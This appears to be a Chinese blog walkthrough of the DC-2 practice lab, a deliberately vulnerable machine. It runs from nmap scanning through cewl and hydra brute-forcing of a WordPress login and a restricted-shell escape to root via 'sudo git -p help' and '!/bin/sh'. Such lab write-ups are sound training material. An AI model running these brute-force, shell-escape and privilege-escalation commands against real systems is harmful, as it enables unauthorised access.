下载地址
我配置的环境:
kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段
渗透
nmap扫描网段,发现存活主机
nmap -sP 192.168.25.0/24
发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息
nmap -A -p 1-65535 192.168.25.128
发现 http服务和 ssh端口开放,想到可以爆破SSH密码,我们先访问80端口,在浏览器输入ip 192.168.25.128,
得到下图效果,浏览器URL变为,说明靶机做了配置,输入ip自动跳转到 dc-2 域名
直接修改本地hosts文件,添加ip对应域名
win10路径: C:\Windows\System32\drivers\etc
linux路径: etc/hosts
再次访问,一个典型的Wordpress站点,页面发现Flag1:
无情的翻译机器:提示我们使用 cewl (爬虫抓取页面信息生成字段)来生成密码进行爆破。
在kali使用工具 cewl
cewl http://dc-2/ -w ~/桌面/passwd.txt
用户名我们可以使用kali已经集成的 wpscan ,然而如下,重新编译安装还是这个玩意,放弃
祭出我的大字典,用Burp爆破 (hydra也阔以),WordPress默认后台地址:/wp-admin 且WordPress当用户名不存在时会提示用户不存在,可增加爆破效率
hydra -L user.txt -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Payloads导入对应字典
attack,kali继承的burp是社区版,所以不能调整线程,慢的一匹,还是用hydra吧。。。
我们跑出了 jerry和tom账户,登进去看看
tom,没啥东西,jerry用户界面如下,发现了flag2
无情的翻译机器,看来是提示我们SSH登录了,其实我们也可以找找关于WordPress的插件,一般WordPress CMS漏洞被挖的差不多了,但是其丰富的插件还是经常爆各种漏洞的,也是一个思路。
try,我们使用jerry用户登录失败,tom成功登陆
查看文件,发现flag3,txt 执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加
BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
bash: groups: command not found
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
参考链接:https://blog.csdn.net/wang_624/article/details/90556462
提示我们切换到Jerry,发现flag4.txt
嗯,作者说没有提示,依然提示 git,我们想到git提权,try, 发现git可以执行root权限,说明我们的思路是正确的
sudo git -p help
!/bin/sh
拿到我们最后的flag.txt,还推了下作者自己的Twitter~
总体来说,和DC基本都是一样的套路,很简单,适合新手练手练习工具的使用,并掌握一些基础知识~